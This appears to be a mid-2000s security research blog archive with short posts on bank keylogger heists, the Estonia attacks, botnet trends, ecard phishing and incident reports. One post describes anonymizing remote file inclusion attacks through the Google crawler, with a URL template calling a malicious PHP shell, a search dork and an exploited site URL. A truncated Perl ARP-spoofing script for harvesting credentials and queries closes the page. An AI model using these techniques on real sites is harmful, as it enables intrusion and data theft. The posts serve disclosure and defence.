The Daily WTF has a good story that may sound a little too familiar to some:

How the aptly-named Super Hacker had managed to shut down the system remotely and provide a fix so quickly intrigued Kiefer. After poking around the network, he finally found the Python file that contained the Super Hacker’s fix:
#!usr/bin/python
# Paying someone $10 to pull a power cord for $3500
print “(C) [Name Removed] 2008.”

The moral of the story: when all else fails, use social engineering.

Bank robbers have found a very interesting technique.

From The Local article Police thwart remote-control bank heist:

Surprised last August to suddenly see his computer cursor moving on its own, the employee at the Knivsta branch of Swedbank, north of Stockholm, “discovered a cable connected to his computer linked to a remote control device fastened under his desk,” local police spokesman Christer Nordström told AFP.

The employee quickly pulled the plug, interrupting a transfer of several hundred million kronor, Nordström said.

And how they managed to install this remote-control device? According to the news sources during a break-in before the incident - no money had been stolen from the bank during a break-in.

A comment posted to Technocrat.net is pointing to another interesting case (from CIO Update article) confirmed as keylogger case:

The story is still developing but this is what we know: Thieves masquerading as cleaning staff with the help of a security guard installed hardware keystroke loggers on computers within the London branch of Sumitomo Mitsui, a huge Japanese bank.

These computers evidently belonged to help desk personnel.

Swedbank is the leading bank in Sweden, Estonia, Latvia and Lithuania with more than 21,700 employees serving 9 million private and 480,000 corporate customers.

This is a bit pointless, as I’m blogging about a “controversy” that has already been settled. I do think there are useful tools to take from this incident, though.

For those out of the loop, a few days ago players of online poker site “Absolute Poker” (no link, deal with it) accused a player called “POTRIPPER” of playing while being able to see the hole cards. I’ll save the poker laymen’s task of trying to figure out what that means (as I had to) - in that variant of poker some of the cards are shown, while others are hidden. People were accusing POTRIPPER that (s)he was playing while being able to see everyone’s hidden cards.

I should point out that this is a settled controversy. Absolute Poker admitted that this is the work of an internal security breach. I am less interested in the specific case, however, than I am in looking at tools designed to answer the “how can we know” question. (more…)

Following up on that strange title, ISOI 3 (Internet Security Operations and Intelligence), a workshop for do-ers who work on the security of the Internet and its users, is happening Monday and Tuesday in Washington, DC.

This time around we have even more government participation (we’re in DC, duh), but a bit less from academia (who can try and look at long term solutions), rather than just us security researchers, and operators (who respond, contain and mitigate incidents).

I am very pleased with our progress on encouraging global cooperation, and getting more industry information sharing going. I am also happy we are moving from “just” good-will based relationships to the physical world with our efforts, being able to take things to the next level with world-wide operational task forces and, indeed, affecting change.

If you are interested in this realm of Internet security operations, take a look at ISOI 3’s schedule, and perhaps submit something for the next workshop.

Some reporters are somewhat annoyed that entrance is barred to them, but I hope they’d understand that although we make things public whenever we can as full disclosure is a strong weapon in the fight against cyber crime, folks can not share as openly when they have to be on their toes all the time.

The third ISOI is here because after DHS ended up unable to host it, sponsors emerged who were happy to assist:

Afilias Ltd.: http://www.afilias.info/
ICANN: http://www.icann.org/
The Internet Society: http://www.isoc.org/
Shinkuro, Inc.: http://www.shinkuro.com/

It’s going to be an interesting next week here at the swamp. Atendees better show up with their two forms of ID.

Gadi Evron,
ge@linuxbox.org.

I posted a column on eWeek on what critical infrastructure means, looking back at the Estonia incident.

They edited out some of what I had to say on home computers and their impact as a critical infrasrtcuture, but hey, word limitations.

http://www.eweek.com/article2/0,1895,2166125,00.asp

Gadi Evron,
ge@linuxbox.org.

In the past two weeks, ecards became a major threat.

Ecards (or electronic greeting cards) were always a perfect social engineering scheme, open for abuse. With the Storm worm and massive exploitation, I believe it has become prudent to filter out all ecard messages in your email systems.

Further, some training or awareness information on this subject distributed to your organizations could be very useful.

Gadi Evron,
ge@linuxbox.org

Syngress was kind enough to allow me to post the chapter I wrote for Botnets: The Killer Web Application here as a free sample.

It is the third chapter in the book, and requires some prior knowledge of what a botnet C&C (command and control) is. It is basic, short, and to my belief covers quite a bit. It had to be short, as I had just 5 days to write it while doing other things, and not planning on any writing, but it is pretty good in my completely unbiased opinion.

You can download it from this link:
http://www.beyondsecurity.com/whitepapers/005_427_Botnet_03.pdf

For the full book, you would need to spend the cash.

Enjoy!

Gadi Evron,
ge@linuxbox.org.

People have been wondering why I’ve been keeping quiet on this issue, especially since I was right there helping out.

A lot of people had information to share and emotions to get out of the way. Also, it was really not my place reply on this - with all the work done by the Estonians, my contributions were secondary. Mr. Alexander Harrowell discussed this with me off mailing lists, and our discussions are public on his blog. Information from Bill Woodcock on NANOG was also sound.

As to what actually happened over there, more information should become available soon and I will send it here. I keep getting stuck when trying to write the post-mortem and attack/defense analysis as I keep hitting a stone wall I did not expect: strategy. Suggestions for the future is also a part of that document, so I will speed it up with a more down-to-Earth technical analysis (which is what I promised CERT-EE).

In the past I’ve been able to consider information warfare as a part of a larger strategy, utilizing it as a weapon. I was able to think of impact and tools, not to mention (mostly) disconnected attacks and defenses.

I keep seeing strategy for the use IN information warfare battles as I write this document on what happened in Estonia, and I believe I need more time to explore this against my previous take on the issue, as well as take a look at some classics such as Clausewitz, as posh as
it may sound.

Thanks,

Gadi Evron,
ge@linuxbox.org.

Many of us have been having discussions and arguments over if the recent BBB phishing attacks are targeted or not.

Thinking on this, I believe the better equivalent which may solve our terminology disagreements on if these BBB phishing emails were targeted or not would be “targeted spam” as a tried concept. We can assume, although in some cases incorrectly, that spam is bulk.

Usually, spam goes to “lists” of addresses, harvested. Sometimes it is targeted to a certain audience. But there are other types of lists, not just of addresses and interests.

It is possible to buy lists of addresses of people who attended RSA and visited booths, for example. Or any other number of trade-shows. It is possible to harvest linkedin, etc.

My take is that this attack is targeted in the sense that it goes to certain individual types only, but is quite mundane and bulk in the type.

We need terms for individual/close-to attacks and attacks by targeting an audience, still in bulk.

Gadi Evron,
ge@linuxbox.org.

Dave Aitel sent this one in, and it’s a good one:
http://news.yahoo.com/s/ap/20070419/ap_on_hi_te/hackers_state_department

Support Intelligence releases daily reports on different fortune 500
companies which are heavily affected by the botnet problem, with many
compromised machines on their networks.

You can find more information on their blog:
http://blog.support-intelligence.com/

They are good people, and they know botnets.

Gadi Evron,
ge@linuxbox.org.

The recent Times Online report Al-Qaeda plot to bring down UK internet shows that massive terrorism operations are being prepared still. The target was the headquarters of Telehouse Europe located in Docklands, London.

Reportedly

The discovery led Eliza Manningham-Buller, head of MI5, to set up the Centre for the Protection of National Infrastructure last month. It is a special MI5 unit…

There are several Internet Exchange Points in London, but we don’t know if this was the only target being planned.

What CPNI? The unit was founded on 1st February and there is no NISCC (National Infrastructure Security Co-ordination Centre) any more.

It appears that Telehouse Docklands has detailed Building Specifications listed at their Main page(!).

A few months back I released a post on where I think anti-botnets technology is heading. Now it’s time for what happened in 2006, and what we can expect from here on.

I am not a believer in such retrospective looks, as often, they are completely biased and based on what we have seen and what we want to see. This is why I will try and limit myself to what we know happens and is likely to get attention, as well as what we have seen tried by bad guys, which is working for them enough to take to the next level.

What changed with botnets in 2006:

1.Botnets reached a level where it is unclear today what parts of the Internet are not compromised to an extent. Count by clean rather than infected.
2. Botnets have become the most significant platform from which virtually any type of online attack and crime are launched. Botnets equal an online infrastructure for abusive or criminal activity online.
3. In the past year, botnets have become mainstream. From a not existent field even in the professional realm up to a few years ago, where attacks were happening constantly reagrdless, it has turned to the main buzzword and occupation of the security industry today, directly and indirectly.
4. Websites have returned to being one the most significant form of infection for building botnets, which hadn’t been the case since the late 90s.
5. Botnets have become the moving force behind organized crime online, with a low-risk high-profit calculation.
6. New technologies are finally being introduced, moving the botnet controllers from using just (or mainly) IRC to more advanced C&C (command and control) channels such as P2P, or multi-layered, such as DNS and IRC on the OSI model.
7. Botnets used to be a game of quantity. Today, when quantity is assured, quality is becoming a high concern for botnet controllers, both in type of bot as well as in abilities.

What’s going to happen with botnets in 2007:

Botnets won’t change. All will remain the same as it has been for years. Awareness however, will increase making the problem appear larger and larger, perhaps approaching its real scale. The bad guys would utilize their infrastructure to get more out of the bots (quality once quantity is here) and be able to do more than just steal cash. Maximizing their revenue.

Further, more and more attackers unrelated to the botnet controllers will make use of already compromised systems and existing botnets to gain access to networks, to facilitate anything from corporate espionage and intelligence gathering, to shame-less and open show of strength to those who oppose them (think Blue Security), in the real world as well as the cyber one (which to the mob is one and the same, it’s the income that speaks).

Meaning, the existing botnets infrastructure will be utilized both in an open fashion, due to the fact online miscreants (real-world mob) face virtually no risk, as well as quiet and secretive uses for third-party intelligence operations.

Gadi Evron,
ge@linuxbox.org.

Google can be utilized to hack into websites - actively exploiting them (not information gathering by the use of “Google hacking”, although that is how most of the sites vulnerable to RFI attacks are found).

By placing a URL on any web page, Google will find it, visit it and then index it. With this mechanism, it is possible to anonymize attacks on third party web sites through Google by the use of its crawler.

PoC -
A malicious web page is constructed by an attacker, containing a URL built like so:
1. Third party site URI to attack.
2. File inclusion exploit.
3. Second URI containing a malicious PHP shell.

Example URL:
http://victim-site/RFI-exploit?http://URI-with-malicious-code.php

Google will harvest this URL, visit the site using its crawler and index it.
Meaning accessing the target site with the URL it was provided and exploiting it unwittingly for whoever planted it. It’s a feature, not a bug.

This is currently exploited in the wild. For example, try searching Google for:
inurl:cmd.gif

And note, as an example:
www.toomuchcookies.net/index.php?s=http:/%20/xpl.netmisphere2.com/CMD.gif?cmd
Which is no longer vulnerable. The %20 seems out of place, but this is how it is shown in the search.

Why use a botnet when one can abuse the Google crawler, which is allowed on most web sites?

Notes:
1. This attack was verified on Google, but there is no reason why it should not work with other search engines, web crawlers and web spiders.
2. File inclusions seem to tie in well with this attack anonymizer, but there is no reason why others attack types can’t be used in a similar fashion.
3. The feature might also be used to anonymize communication, as a covert channel.

Noam Rathaus.
(with thanks to Gadi Evron and Lev Toger)

Earlier this year, Beyond Security’s beSIRT released an incident response forensic analysis of a defacement attack by Team Evil [Team Evil Incident (Cyber-terrorism defacement analysis and response)].

The PDF itself can be found here:

http://www.beyondsecurity.com/besirt/advisories/team-evil-incident.pdf

A follow up is being released today, on a second incident. Following what Team Evil did, their methodology and how it changed since the first document was released.

The aim of this document is more to show how such analysis is done, on an educational note. The PDF can be found here:

http://www.beyondsecurity.com/besirt/advisories/teamevil-incident2.pdf

We hope you find this useful.

Kfir.

Sitting at a security conference in Boston, I wrote down a quick and dirty script that just listen for ARP requests and responds to any such requests with … Hay That is Me ™ … The things you can find using that… here is a summary:

1) SNMP community names
2) SMB keypairs (you need to use fakesmb)
3) DNS queries (if you answer them it is even more fun)
4) HTTP requests for odd stuff (once you answered the DNS queries, and have set Apache to answer incoming connections you are all set)

I am sure a lot more can be done… I will leave it to your imagination

#!/usr/bin/perl
# Writen by Noam Rathaus, Beyond Security (r)

use Net::Pcap;

my $Interface = “eth1″;
(more…)